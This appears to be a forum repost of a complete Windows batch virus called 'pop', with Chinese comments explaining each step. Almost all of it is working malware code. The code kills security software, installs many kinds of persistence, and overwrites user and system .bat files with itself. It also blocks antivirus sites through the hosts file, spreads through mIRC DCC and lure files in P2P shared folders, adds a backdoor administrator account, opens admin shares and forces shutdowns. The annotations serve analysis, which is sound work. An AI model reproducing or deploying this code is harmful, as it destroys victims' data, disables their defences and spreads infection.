CODE: [Copy to clipboard]
::去掉了那些干扰别人的无用代码,并将一些有意设置的干扰的环境变量替换了,如set pop=tskill等
copy %0 %windir%\pop.bat
::将自己复制到windows目录下,名字为pop.bat
tskill norton*
tskill av*
tskill fire*
tskill anti*
tskill spy*
tskill bullguard
tskill PersFw
tskill KAV*
tskill ZONEALARM
tskill SAFEWEB
tskill OUTPOST
tskill nv*
tskill nav*
tskill F-*
tskill ESAFE
tskill cle
tskill BLACKICE
tskill def*
::关闭常见安全进程
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
echo [windows] >> %windir%\win.ini
echo run=%windir%\pop.bat >> %windir%\win.ini
echo load=%windir%\pop.bat >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe pop.bat >> %windir%\system.ini
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\pop.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pop.bat" > nul
::在注册表的run项,win.ini,system.ini和启动文件创建自启动项
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
::开启系统的默认共享
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
::利用host文件将常见安全网站屏蔽
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
::弹出一个对话框显示你中招了-_-,明显在自我炫耀
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\pop.bat" /f > nul
::将自己复制到windows目录下面,名字是随机的,并在注册表的run和RunServices添加启动项,显示名字为html和pop
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
::用自身覆盖system32和windows目录下面的所有.bat文件
copy %0 c:\autoexec.bat
::用自身覆盖c:\autoexec.bat
copy %0 %windir%\ftppassword.bat
echo [script] > irc.bat
echo n1={ if ($nick == $me) { halt } >> irc.bat
echo n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
echo n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
::script代码不懂,貌似生成irc.bat和ftppassword.bat是利用mIRC漏洞的东西
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
::在program file下面的pop\xxx和cracks文件生成一堆文件,并把这两个目录共享出去
net user root pwd /add
net localgroup "Administratoren" root /add
net localgroup "Administrators" root /add
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
::建立管理员帐户并设置网络共享的权限
echo "<html>" > %windir%\hax0r.html
echo "<head>" >> %windir%\hax0r.html
echo "<title>Virus</title>" >> %windir%\hax0r.html
echo "</head>" >> %windir%\hax0r.html
echo "<body bgcolor="#000000">" >> %windir%\hax0r.html
echo "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
echo "</body>" >> %windir%\hax0r.html
echo "</html>" >> %windir%\hax0r.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
::生成一个显示你中招了的网页文件并设为主页,又在炫耀自己了-_-
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
::继续创建一些文件,把自己放到一些P2P软件的共享目录下面陷害一些无知而好奇的人
shutdown /r /f /t 23 /c "Infected with pop virus!!"
shutdown /s /f /t 23 /c "Infected with pop virus!!"
::重启之后又关机?!还要再次炫耀一下,提醒你中招了……
:bombing
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
::这个的作用应该是防止在关机倒数期间的启动文件夹的启动文件被删除,不断的结束explorer.exe和lsass.exe造成骚扰
:: pop by pop
::上面那个是作者的注释,算是是版权声明吧-_-
[